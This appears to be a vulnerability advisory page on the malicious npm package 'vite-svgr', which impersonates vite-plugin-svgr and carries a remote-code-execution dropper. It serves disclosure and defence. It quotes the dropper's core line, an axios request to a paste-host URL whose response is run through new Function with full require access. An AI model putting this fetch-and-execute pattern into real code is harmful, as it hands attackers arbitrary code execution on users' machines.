Vulnerability
Malicious code in vite-svgr (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5) Package name `vite-svgr` impersonates the popular `vite-plugin-svgr`, but the shipped code is a fork of `tsconfig-paths` (package.json description: 'Load node modules according to tsconfig paths') with an added remote-code-execution dropper at lib/mapProps.js. The dropper performs `axios.get('https://www.jsonkeeper.com/b/EQUBH', { headers: { 'x-secret-key': '_' } })` and then runs the response body's `Cookie` field via `new Function('require', s)(require)` — arbitrary JavaScript with full Node `require` access executed under the installer's user. The code is reachable from the package's `main` via the exported `configJson(...)`, which spawns `node lib/mapProps.js` detached, so any consumer that imports this package and calls `configJson` triggers fetch-and-execute against an anonymous, mutable paste host. The combination of name impersonation, fork of an unrelated library, and remote-payload-execution is the canonical supply-chain attack shape.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence